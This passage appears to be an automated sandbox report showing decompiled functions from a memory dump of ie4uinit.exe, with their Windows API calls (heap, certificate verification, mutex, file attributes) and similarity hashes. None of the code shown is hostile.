				if (_t119 == 0) goto 0x319d40fd;
				E00007FF77FF7319D80E0(_t37, _t119);
				 *((long long*)(_t149 + 0x60)) = _t119;
				if (_t119 == 0) goto 0x319d4116;
				E00007FF77FF7319D94B4(_t122,  *((intOrPtr*)(_t146 + 0x60)), _t119, _t149);
				goto 0x319d411b;
				return 0x8007000e;
			}

0x7ff7319d3f18
0x7ff7319d3f18
0x7ff7319d3f1b
0x7ff7319d3f1f
0x7ff7319d3f23
0x7ff7319d3f27
0x7ff7319d3f3b
0x7ff7319d3f3e
0x7ff7319d3f44
0x7ff7319d3f48
0x7ff7319d3f53
0x7ff7319d3f5b
0x7ff7319d3f6f
0x7ff7319d3f75
0x7ff7319d3f7c
0x7ff7319d3f84
0x7ff7319d3f89
0x7ff7319d3f8e
0x7ff7319d3f91
0x7ff7319d3f93
0x7ff7319d3f99
0x7ff7319d3faa
0x7ff7319d3fb2
0x7ff7319d3fbf
0x7ff7319d3fc3
0x7ff7319d3fc9
0x7ff7319d3fd2
0x7ff7319d3fde
0x7ff7319d3fe7
0x7ff7319d3fed
0x7ff7319d3ff3
0x7ff7319d3ff9
0x7ff7319d3fff
0x7ff7319d4005
0x7ff7319d400b
0x7ff7319d4011
0x7ff7319d4017
0x7ff7319d401a
0x7ff7319d401d
0x7ff7319d4025
0x7ff7319d4027
0x7ff7319d402e
0x7ff7319d4032
0x7ff7319d403e
0x7ff7319d4048
0x7ff7319d4053
0x7ff7319d4055
0x7ff7319d4055
0x7ff7319d405c
0x7ff7319d4060
0x7ff7319d406c
0x7ff7319d4076
0x7ff7319d4081
0x7ff7319d4086
0x7ff7319d4091
0x7ff7319d409a
0x7ff7319d409c
0x7ff7319d40ab
0x7ff7319d40ae
0x7ff7319d40b7
0x7ff7319d40ba
0x7ff7319d40be
0x7ff7319d40c7
0x7ff7319d40ce
0x7ff7319d40d0
0x7ff7319d40d7
0x7ff7319d40dc
0x7ff7319d40e0
0x7ff7319d40eb
0x7ff7319d40f3
0x7ff7319d40f8
0x7ff7319d40fd
0x7ff7319d4104
0x7ff7319d410d
0x7ff7319d4114
0x7ff7319d413b

APIs

CoTaskMemFree.OLE32(?,00000000,?,00007FF7319CD223), ref: 00007FF7319D4032
SHStrDupW.SHLWAPI(?,00000000,?,00007FF7319CD223), ref: 00007FF7319D403E
CoTaskMemFree.OLE32(?,00000000,?,00007FF7319CD223), ref: 00007FF7319D4060
SHStrDupW.SHLWAPI(?,00000000,?,00007FF7319CD223), ref: 00007FF7319D406C
memcpy_s.MSVCRT ref: 00007FF7319D40AE

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: FreeTask$memcpy_s
String ID:
API String ID: 3307904802-0
Opcode ID: 3f760f84861f5d6caceec0fe362b45a281db3f278ff81ce3a649680f74c1f6bc
Instruction ID: 8264ea7a06d38edd0a2c8c1c2bc6bc60b820071dd85879ce93421d2e2a219a48
Opcode Fuzzy Hash: 3f760f84861f5d6caceec0fe362b45a281db3f278ff81ce3a649680f74c1f6bc
Instruction Fuzzy Hash: 54614B26B08786A7EB54EB26D188369B3A0FB48B48F444035CB4E47B95DFBCF450D760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C7EB4 Relevance: 7.6, APIs: 5, Instructions: 141
memoryCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E00007FF77FF7319C7EB4(long long __rbx, void* __rcx, intOrPtr* __rdx, signed int __rsi, long long __rbp, long long __r9, long long _a8, long long _a16, char _a24, long long _a32) {
				void* __rdi;
				void* _t93;
				long long _t94;
				void* _t100;
				intOrPtr _t103;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t113;
				signed long long _t115;
				signed long long _t123;
				signed long long _t124;
				unsigned long long _t128;
				intOrPtr _t133;
				void* _t139;
				long long* _t144;
				void* _t145;
				long long _t147;
				void* _t149;
				long long _t155;

				_a8 = __rbx;
				_a16 = __rbp;
				_a32 = __rsi;
				 *((intOrPtr*)(__rcx + 4)) = r8d;
				_t144 = __rcx + 0x40;
				 *((intOrPtr*)(__rcx + 8)) =  *((intOrPtr*)(__rdx + 4));
				r9d = 0;
				 *((long long*)(__rcx + 0x10)) = __r9;
				_t123 = __rsi | 0xffffffff;
				 *((short*)(__rcx + 0x18)) =  *(__rdx + 0x38) & 0x0000ffff;
				 *((intOrPtr*)(__rcx + 0x1c)) =  *__rdx;
				 *((long long*)(__rcx + 0x28)) = __r9;
				 *((long long*)(__rcx + 0x30)) =  *((intOrPtr*)(__rdx + 0x80));
				 *((long long*)(__rcx + 0x38)) =  *((intOrPtr*)(__rdx + 0x88));
				 *_t144 = __r9;
				_t103 =  *((intOrPtr*)(__rdx + 0x30));
				if (_t103 != 0) goto 0x319c7f2b;
				goto 0x319c7f3a;
				_t93 = _t123 + 1;
				if ( *((intOrPtr*)(_t103 + _t93)) != r9b) goto 0x319c7f2e;
				_t94 = _t93 + 1;
				_t113 =  *((intOrPtr*)(__rdx + 0x78));
				if (_t113 != 0) goto 0x319c7f48;
				goto 0x319c7f57;
				_t105 = _t123 + 1;
				if ( *((intOrPtr*)(_t113 + _t105)) != r9b) goto 0x319c7f4b;
				_t133 =  *((intOrPtr*)(__rdx + 0x10));
				if (_t133 != 0) goto 0x319c7f69;
				goto 0x319c7f7e;
				_t115 = _t123 + 1;
				if ( *((intOrPtr*)(_t133 + _t115 * 2)) != r9w) goto 0x319c7f6c;
				_t147 = 2 + _t115 * 2 + _t105 + 1 + _t94;
				if ( *((intOrPtr*)(__rcx + 0x48)) == __r9) goto 0x319c7f91;
				if ( *((intOrPtr*)(__rcx + 0x50)) - _t147 >= 0) goto 0x319c7fd1;
				GetProcessHeap();
				HeapAlloc(??, ??, ??);
				if (_t94 == 0) goto 0x319c7fcd;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				 *((long long*)(__rcx + 0x48)) = _t94;
				 *((long long*)(__rcx + 0x50)) = _t147;
				_t109 =  *((intOrPtr*)(__rcx + 0x48));
				if (_t109 == 0) goto 0x319c8085;
				_t149 =  *((intOrPtr*)(__rcx + 0x50)) + _t109;
				E00007FF77FF7319C9D14(__rcx, _t109, _t149, __rdx, _t123,  *((intOrPtr*)(__rdx + 0x30)), __rcx + 0x10);
				E00007FF77FF7319C9D14(__rcx, _t94, _t149, __rdx, _t123,  *((intOrPtr*)(__rdx + 0x78)), __rcx + 0x28);
				r13d = 0;
				_t155 = _t94;
				_a24 = r13w;
				_t139 =  !=  ?  *((void*)(__rdx + 0x10)) :  &_a24;
				if (_t139 == 0) goto 0x319c8038;
				_t124 = _t123 + 1;
				if ( *((intOrPtr*)(_t139 + _t124 * 2)) != r13w) goto 0x319c8026;
				_t128 = 2 + _t124 * 2 >> 1;
				_t100 =  <  ? _t128 : _t149 - _t155 >> 1;
				__imp__memcpy_s();
				if (_t144 == 0) goto 0x319c8073;
				_t96 =  >  ? _t155 : _t145;
				 *_t144 =  >  ? _t155 : _t145;
				if (_t100 - _t128 >= 0) goto 0x319c8085;
				if (_t100 == 0) goto 0x319c8085;
				 *((short*)(_t100 + _t100 + _t155 - 2)) = 0;
				return 0;
			}

0x7ff7319c7eb4
0x7ff7319c7eb9
0x7ff7319c7ebe
0x7ff7319c7ed0
0x7ff7319c7edb
0x7ff7319c7edf
0x7ff7319c7ee2
0x7ff7319c7ee5
0x7ff7319c7ef0
0x7ff7319c7ef4
0x7ff7319c7efd
0x7ff7319c7f00
0x7ff7319c7f0a
0x7ff7319c7f15
0x7ff7319c7f19
0x7ff7319c7f1d
0x7ff7319c7f24
0x7ff7319c7f29
0x7ff7319c7f2e
0x7ff7319c7f35
0x7ff7319c7f37
0x7ff7319c7f3a
0x7ff7319c7f41
0x7ff7319c7f46
0x7ff7319c7f4b
0x7ff7319c7f52
0x7ff7319c7f57
0x7ff7319c7f63
0x7ff7319c7f67
0x7ff7319c7f6c
0x7ff7319c7f74
0x7ff7319c7f82
0x7ff7319c7f89
0x7ff7319c7f8f
0x7ff7319c7f91
0x7ff7319c7fa2
0x7ff7319c7fae
0x7ff7319c7fb0
0x7ff7319c7fbf
0x7ff7319c7fc5
0x7ff7319c7fc9
0x7ff7319c7fd1
0x7ff7319c7fd8
0x7ff7319c7fea
0x7ff7319c7ff0
0x7ff7319c8002
0x7ff7319c8007
0x7ff7319c8013
0x7ff7319c8016
0x7ff7319c801c
0x7ff7319c8024
0x7ff7319c8026
0x7ff7319c802e
0x7ff7319c803b
0x7ff7319c804a
0x7ff7319c8059
0x7ff7319c8062
0x7ff7319c806b
0x7ff7319c806f
0x7ff7319c8076
0x7ff7319c807b
0x7ff7319c807f
0x7ff7319c80a1

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7319C7F91
HeapAlloc.KERNEL32 ref: 00007FF7319C7FA2
GetProcessHeap.KERNEL32 ref: 00007FF7319C7FB0
HeapFree.KERNEL32 ref: 00007FF7319C7FBF
memcpy_s.MSVCRT ref: 00007FF7319C8059

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Heap$Process$AllocFreememcpy_s
String ID:
API String ID: 3519707287-0
Opcode ID: 0688227eddbec96dc8be69fe47e3705afca657c4fc4a91d451f7dcf8b22f053c
Instruction ID: a440af4ed5f911eb2f2e5390e1e1df2cf879e2f6061fd4b006fa2a5151c4b35d
Opcode Fuzzy Hash: 0688227eddbec96dc8be69fe47e3705afca657c4fc4a91d451f7dcf8b22f053c
Instruction Fuzzy Hash: 695128B2B09B86A2DB14EF25E840268B7A0FB04F8CF944135DE8D43758DF78D4A6D750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D7C38 Relevance: 7.6, APIs: 5, Instructions: 104
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00007FF77FF7319D7C38(long long __rbx, signed int __rcx, long long __rdx, long long __rsi, signed int* __r8) {
				void* _t39;
				void* _t42;
				void* _t53;
				signed int _t55;
				long long _t72;
				long long _t84;
				int _t88;
				int _t93;
				void* _t94;
				void* _t96;
				void* _t97;
				void* _t105;
				signed int _t106;

				_t84 = __rdx;
				 *((long long*)(_t96 + 8)) = __rbx;
				 *((long long*)(_t96 + 0x10)) = __rsi;
				_t94 = _t96 - 0x47;
				_t97 = _t96 - 0x90;
				 *__r8 =  *__r8 & 0x00000000;
				_t74 = __rdx;
				 *(_t94 + 0x77) =  *(_t94 + 0x77) & 0x00000000;
				_t106 = __rcx;
				_t7 = _t84 + 0x20; // 0x20
				r8d = _t7;
				_t39 = memset(_t105, _t88, _t93);
				 *((intOrPtr*)(_t94 + 0x1f)) = 0x20;
				 *((long long*)(_t97 + 0x38)) = _t94 + 0x77;
				r9d = 0;
				 *(_t97 + 0x30) =  *(_t97 + 0x30) & 0x00000000;
				 *((intOrPtr*)(_t97 + 0x28)) = 0x40000001;
				r8d = 0;
				 *((long long*)(_t97 + 0x20)) = _t94 + 0x1f;
				__imp__CertGetCertificateChain();
				if (_t39 == 0) goto 0x319d7d94;
				_t72 =  *(_t94 + 0x77);
				if ( *((intOrPtr*)(_t72 + 0xc)) <= 0) goto 0x319d7d88;
				 *((long long*)(_t94 + 7)) = _t72;
				 *((long long*)(_t94 - 9)) = _t72;
				 *((intOrPtr*)(_t94 + 7)) = 0x18;
				 *((intOrPtr*)(_t94 - 9)) = 0x10;
				 *((long long*)(_t94 + 0xf)) = _t72;
				 *((long long*)(_t94 + 0x17)) = _t72;
				 *((long long*)(_t94 - 1)) = _t72;
				if (E00007FF77FF7319C6638() == 0) goto 0x319d7d19;
				 *((intOrPtr*)(_t94 - 5)) = 0x20000;
				__imp__CertVerifyCertificateChainPolicy();
				_t53 =  !=  ?  *(_t94 + 0xb) : 0x80004005;
				goto 0x319d7d23;
				_t42 = E00007FF77FF7319D7DCC(_t74, _t106,  *(_t94 + 0x77), __r8);
				if (_t42 < 0) goto 0x319d7d7c;
				__imp__CertVerifyCertificateChainPolicy();
				if (_t42 == 0) goto 0x319d7d6a;
				_t55 =  *(_t94 + 0xb);
				if (_t88 + 0x7ff6dfee - 1 <= 0) goto 0x319d7d66;
				if (_t55 == 0x80092010) goto 0x319d7d60;
				if (_t55 != 0x800b0101) goto 0x319d7d6f;
				 *__r8 = _t55;
				goto 0x319d7d88;
				goto 0x319d7d6f;
				if (0x80004005 >= 0) goto 0x319d7d88;
				goto 0x319d7d83;
				E00007FF77FF7319D210C(_t74, 0x319ec704);
				__imp__CertFreeCertificateChain();
				goto 0x319d7da0;
				E00007FF77FF7319D210C(_t74, 0x319ec700);
				if (0x80004005 >= 0) goto 0x319d7db0;
				E00007FF77FF7319D210C(_t74, 0x319ec6fc);
				return 0x80004005;
			}

0x7ff7319d7c38
0x7ff7319d7c38
0x7ff7319d7c3d
0x7ff7319d7c46
0x7ff7319d7c4b
0x7ff7319d7c52
0x7ff7319d7c56
0x7ff7319d7c59
0x7ff7319d7c63
0x7ff7319d7c6f
0x7ff7319d7c6f
0x7ff7319d7c73
0x7ff7319d7c7c
0x7ff7319d7c83
0x7ff7319d7c88
0x7ff7319d7c8b
0x7ff7319d7c95
0x7ff7319d7c9d
0x7ff7319d7ca3
0x7ff7319d7caa
0x7ff7319d7cb2
0x7ff7319d7cb8
0x7ff7319d7cc0
0x7ff7319d7cc8
0x7ff7319d7ccc
0x7ff7319d7cd0
0x7ff7319d7cd7
0x7ff7319d7cde
0x7ff7319d7ce2
0x7ff7319d7ce6
0x7ff7319d7cf5
0x7ff7319d7cfb
0x7ff7319d7d0b
0x7ff7319d7d13
0x7ff7319d7d17
0x7ff7319d7d1c
0x7ff7319d7d25
0x7ff7319d7d38
0x7ff7319d7d40
0x7ff7319d7d42
0x7ff7319d7d4e
0x7ff7319d7d56
0x7ff7319d7d5e
0x7ff7319d7d60
0x7ff7319d7d64
0x7ff7319d7d68
0x7ff7319d7d71
0x7ff7319d7d7a
0x7ff7319d7d83
0x7ff7319d7d8c
0x7ff7319d7d92
0x7ff7319d7d9b
0x7ff7319d7da2
0x7ff7319d7dab
0x7ff7319d7dc9

APIs

memset.MSVCRT ref: 00007FF7319D7C73
CertGetCertificateChain.CRYPT32 ref: 00007FF7319D7CAA
CertFreeCertificateChain.CRYPT32 ref: 00007FF7319D7D8C

Part of subcall function 00007FF7319C6638: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF7319CB2D5), ref: 00007FF7319C6650

CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF7319D7D0B

Part of subcall function 00007FF7319D210C: #796.IERTUTIL ref: 00007FF7319D2167

CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF7319D7D38

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CertCertificateChain$OncePolicyVerify$#796ExecuteFreeInitmemset
String ID:
API String ID: 2708282856-0
Opcode ID: 6222e5d623cf8afac12bdf665af0bc9cc8e201cb3221b33959cf6b94676be33f
Instruction ID: e20769ae3497e7703160bd30df612c42793ee3d040064bd88b44ac2cb6dbcdfa
Opcode Fuzzy Hash: 6222e5d623cf8afac12bdf665af0bc9cc8e201cb3221b33959cf6b94676be33f
Instruction Fuzzy Hash: 51414933E18A86A9E714AF21D8443ADB3A1FB8474CF908035DA4C57A9CDFB9E505E720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D530C Relevance: 7.6, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7319D62D9), ref: 00007FF7319D5364
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7319D62D9), ref: 00007FF7319D5414

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7319D62D9), ref: 00007FF7319D53B2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7319D62D9), ref: 00007FF7319D53C9
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7319D62D9), ref: 00007FF7319D53DD

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$ByteCharMultiWide$HeapProcess
String ID:
API String ID: 1962985005-0
Opcode ID: df0a9a40585e8bdf9b15f104619403c70f311ef90464d39010696612a9c10158
Instruction ID: 15cd3f07b2b5801250795e06ab8e1fd9f55611e803cfc8427e4c83c06f895cec
Opcode Fuzzy Hash: df0a9a40585e8bdf9b15f104619403c70f311ef90464d39010696612a9c10158
Instruction Fuzzy Hash: FC31AE32F09B82D6F710AB65E58827CB3A4AF88B95F844134CB4D97358DFBCE410A360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CF860 Relevance: 7.6, APIs: 5, Instructions: 86
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00007FF77FF7319CF860(void* __edx, long long __rbx, void* __rcx, void* __rdx) {
				long _t25;
				long _t28;
				void* _t40;
				signed int _t42;
				void* _t45;
				signed long long _t62;
				long long* _t69;
				void* _t81;
				void* _t83;
				intOrPtr _t84;
				void* _t86;
				long long _t89;
				void* _t91;
				signed long long _t92;
				void* _t96;
				void* _t98;

				_t81 = __rdx;
				_t68 = __rbx;
				 *((long long*)(_t91 + 0x10)) = __rbx;
				 *((long long*)(_t91 + 0x18)) = _t89;
				_t92 = _t91 - 0x230;
				_t62 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t92 + 0x220) = _t62 ^ _t92;
				_t84 =  *((intOrPtr*)(__rcx + 0x18));
				 *((short*)(_t92 + 0x20)) = 0;
				if ( *((intOrPtr*)(_t84 + 0x28)) != _t89) goto 0x319cf910;
				if ( *((intOrPtr*)(_t84 + 8)) == 0) goto 0x319cf908;
				if ((WaitForSingleObject(_t98) & 0xffffff7f) == 0) goto 0x319cf8f4;
				_t25 = GetLastError();
				_t10 = _t89 + 1; // 0x1
				r14d = _t10;
				_t26 =  ==  ? r14d : _t25;
				_t54 =  ==  ? r14d : _t25;
				if (( ==  ? r14d : _t25) > 0) goto 0x319cf8dd;
				_t40 =  ==  ? r14d : GetLastError();
				goto 0x319cf910;
				_t28 = GetLastError();
				_t29 =  ==  ? r14d : _t28;
				_t41 = ( ==  ? r14d : _t28) & 0x0000ffff;
				_t42 = ( ==  ? r14d : _t28) & 0x0000ffff | 0x80070000;
				goto 0x319cf910;
				E00007FF77FF7319D33F8(_t28, __rbx, _t84);
				ReleaseMutex(_t83);
				goto 0x319cf910;
				E00007FF77FF7319D33F8(_t28, _t68, _t84);
				if ( *((intOrPtr*)(_t84 + 0x28)) == 0) goto 0x319cf92a;
				if (E00007FF77FF7319C1310(_t68, _t92 + 0x20, _t81,  *((intOrPtr*)(_t84 + 0x28)), _t96) < 0) goto 0x319cf96d;
				_t69 = __rcx + 0x10;
				if ( *_t69 == 0) goto 0x319cf94a;
				 *0x319e7038(_t86);
				 *_t69 = _t89;
				if ( *0x319e7038() < 0) goto 0x319cf96d;
				 *((intOrPtr*)(__rcx + 8)) = bpl;
				return E00007FF77FF7319E38D0(_t35, _t45,  *(_t92 + 0x220) ^ _t92);
			}

0x7ff7319cf860
0x7ff7319cf860
0x7ff7319cf860
0x7ff7319cf865
0x7ff7319cf86e
0x7ff7319cf875
0x7ff7319cf87f
0x7ff7319cf887
0x7ff7319cf88d
0x7ff7319cf89e
0x7ff7319cf8a7
0x7ff7319cf8b7
0x7ff7319cf8b9
0x7ff7319cf8c1
0x7ff7319cf8c1
0x7ff7319cf8c5
0x7ff7319cf8c9
0x7ff7319cf8cb
0x7ff7319cf8d7
0x7ff7319cf8db
0x7ff7319cf8dd
0x7ff7319cf8e5
0x7ff7319cf8e9
0x7ff7319cf8ec
0x7ff7319cf8f2
0x7ff7319cf8f7
0x7ff7319cf900
0x7ff7319cf906
0x7ff7319cf90b
0x7ff7319cf917
0x7ff7319cf92c
0x7ff7319cf92e
0x7ff7319cf938
0x7ff7319cf941
0x7ff7319cf947
0x7ff7319cf967
0x7ff7319cf969
0x7ff7319cf996

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF7319CF8AC
GetLastError.KERNEL32 ref: 00007FF7319CF8B9
GetLastError.KERNEL32 ref: 00007FF7319CF8CD
GetLastError.KERNEL32 ref: 00007FF7319CF8DD
ReleaseMutex.KERNEL32 ref: 00007FF7319CF900

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$MutexObjectReleaseSingleWait
String ID:
API String ID: 3488842590-0
Opcode ID: 42fab01a522395885f2275800fda257a738126e11f7e3ab6a5587141e2c4ccb0
Instruction ID: b77bd64850db43b8d490a91ef0532c65824f838e6f954685fc635aabb0042a5e
Opcode Fuzzy Hash: 42fab01a522395885f2275800fda257a738126e11f7e3ab6a5587141e2c4ccb0
Instruction Fuzzy Hash: A5319922F08BC1B5EB14AF16D4942A9A360FF48B94FC44135CA9D5366DCFBCE541E760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E00F4 Relevance: 7.6, APIs: 5, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00007FF77FF7319E00F4(signed long long __rbx, void* __rcx, void* __rdx, signed long long __rdi, signed long long __rsi, signed long long __rbp, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t18;
				signed long long* _t43;
				WCHAR* _t46;
				WCHAR* _t60;
				signed long long* _t67;
				WCHAR* _t73;
				void* _t75;
				void* _t78;

				_t43 = _t67;
				_t43[1] = __rbx;
				_t43[2] = __rbp;
				_t43[3] = __rsi;
				_t43[4] = __rdi;
				r12d = 0;
				E00007FF77FF7319C1670();
				if (_t43 == 0) goto 0x319e013b;
				 *_t43 =  *_t43 | 0xffffffff;
				goto 0x319e013e;
				_t46 = _t73;
				if (_t46 == 0) goto 0x319e018a;
				r9d = r8d;
				if (E00007FF77FF7319E0670(_t46, _t46, _t46, __rcx, __rsi, __rdx, _t78) < 0) goto 0x319e015f;
				_t60 = _t46;
				goto 0x319e018f;
				if ( *_t46 == 0xffffffff) goto 0x319e0180;
				CloseHandle(_t75);
				if (_t46[6] == _t46[4]) goto 0x319e0180;
				SetFileAttributesW(_t73);
				_t18 = E00007FF77FF7319C1698(_t43, _t46);
				goto 0x319e018f;
				if (0x8007000e < 0) goto 0x319e01e0;
				__imp__#85();
				_t32 =  !=  ? r12d : 0x8007000e;
				if (_t18 != 0xffffffff) goto 0x319e01e0;
				if (_t60 == 0) goto 0x319e01e0;
				if ( *_t60 == 0xffffffff) goto 0x319e01d8;
				CloseHandle(??);
				if (_t60[6] == _t60[4]) goto 0x319e01d8;
				SetFileAttributesW(??, ??);
				E00007FF77FF7319C1698(_t43, _t60);
				_t22 =  !=  ? r12d : 0x8007000e;
				return  !=  ? r12d : 0x8007000e;
			}

0x7ff7319e00f4
0x7ff7319e00f7
0x7ff7319e00fb
0x7ff7319e00ff
0x7ff7319e0103
0x7ff7319e0114
0x7ff7319e0128
0x7ff7319e0133
0x7ff7319e0135
0x7ff7319e0139
0x7ff7319e013b
0x7ff7319e0141
0x7ff7319e0143
0x7ff7319e0158
0x7ff7319e015a
0x7ff7319e015d
0x7ff7319e0163
0x7ff7319e0168
0x7ff7319e0174
0x7ff7319e017a
0x7ff7319e0183
0x7ff7319e0188
0x7ff7319e0191
0x7ff7319e019e
0x7ff7319e01ac
0x7ff7319e01b0
0x7ff7319e01b5
0x7ff7319e01bb
0x7ff7319e01c0
0x7ff7319e01cc
0x7ff7319e01d2
0x7ff7319e01db
0x7ff7319e01e5
0x7ff7319e0200

APIs

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

CloseHandle.KERNEL32 ref: 00007FF7319E0168
SetFileAttributesW.KERNEL32 ref: 00007FF7319E017A
#85.IERTUTIL ref: 00007FF7319E019E
CloseHandle.KERNEL32 ref: 00007FF7319E01C0
SetFileAttributesW.KERNEL32 ref: 00007FF7319E01D2

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: AttributesCloseFileHandle$HeapProcess
String ID:
API String ID: 3375093513-0
Opcode ID: 88b65d0b7aa516ab8de9520ea4a4b3089a1027aa95222fb823b89ec20402a3e6
Instruction ID: cd657944175a000ea6a140889b53e91789d705db6e2f4ec36bafe1409b4f6bdf
Opcode Fuzzy Hash: 88b65d0b7aa516ab8de9520ea4a4b3089a1027aa95222fb823b89ec20402a3e6
Instruction Fuzzy Hash: 2A314F22F08682A2E754AB51D940038A751BB84BB8F998335CE791B7D9DFB8E8519370

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C15A0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7319C15E9
VerSetConditionMask.KERNEL32 ref: 00007FF7319C1603
VerSetConditionMask.KERNEL32 ref: 00007FF7319C1612
VerSetConditionMask.KERNEL32 ref: 00007FF7319C1621
VerifyVersionInfoW.KERNEL32 ref: 00007FF7319C1642

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
